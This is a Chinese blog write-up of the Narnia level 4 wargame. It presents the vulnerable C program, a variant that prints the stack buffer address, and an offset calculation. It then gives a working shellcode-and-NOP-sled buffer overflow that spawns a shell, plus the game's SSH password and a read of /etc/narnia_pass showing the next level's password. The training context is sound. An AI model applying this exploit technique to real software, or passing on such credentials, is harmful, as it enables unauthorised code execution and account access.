narnia4

最新推荐文章于 2021-12-09 11:31:01 发布

shuimuyq

最新推荐文章于 2021-12-09 11:31:01 发布

阅读量430

点赞数

CC 4.0 BY-SA版权

分类专栏： wargames wargames-writeup

本文链接：https://blog.youkuaiyun.com/shuimuyq/article/details/50674162

wargames-writeup 同时被 2 个专栏收录

26 篇文章

订阅专栏

wargames

25 篇文章

订阅专栏

本文介绍了一种通过计算不同执行路径下buffer地址的方法来定位shellcode的位置。利用特定的C程序nar.c，通过GCC编译并附加参数以禁用堆栈保护，实现了对buffer地址的精确获取。通过对./nar与/narnia/narnia4两种执行方式下buffer地址的对比分析，得出了地址偏移规律。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

/** narnia4.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
	int i;
	char buffer[256];

	for(i = 0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));

	if(argc>1)
		strcpy(buffer,argv[1]);

	return 0;
}

/** nar.c */

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
	int i;
	char buffer[256];

        printf("%p\n", buffer);
	for(i = 0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));

	if(argc>1)
		strcpy(buffer,argv[1]);

	return 0;
}

栈环境

要把shellcode放在buffer中，但是不知道buffer的地址，用nar.c计算出buffer的地址

narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit

通过测试我们知道当可执行程序为 ./nar 时， buffer的地址为0xffffd3dc

那我们可以计算出当可执行程序为 /narnia/narnia4 时，buffer的地址为 0xffffd3dc

计算过程如下：

./nar 的长度为5个字节，根据narnia2了解到，在环境变量之前有两个字段与argv[0]有关，那么长度为10字节，在main函数中有16字节对齐，那么就是16字节

/narnia/narnia4长度是15字节，在环境变量之前有两个字段与argv[0]有关，那么长度为30字节，在main函数中有16字节对齐，那么就是32字节

这样就可以知道以./nar 运行的程序的buffer地址比以/narnia/narnia4运行的程序的buffer地址大16字节

那么以/narnia/narnia4运行的程序的buffer地址为 0xffffd3cc

root@yangq:~# ssh narnia4@178.79.134.250

narnia4@178.79.134.250's password: thaenohtai

narnia4@melinda:~$ cd /tmp/shadowcoder4

narnia4@melinda:/tmp/shadowcoder4$ ls
nar  nar.c  narnia4  narnia4.c  sleep.sh

narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit

narnia4@melinda:/tmp/shadowcoder4$ /narnia/narnia4 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xcc\xd3\xff\xff"'`
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
$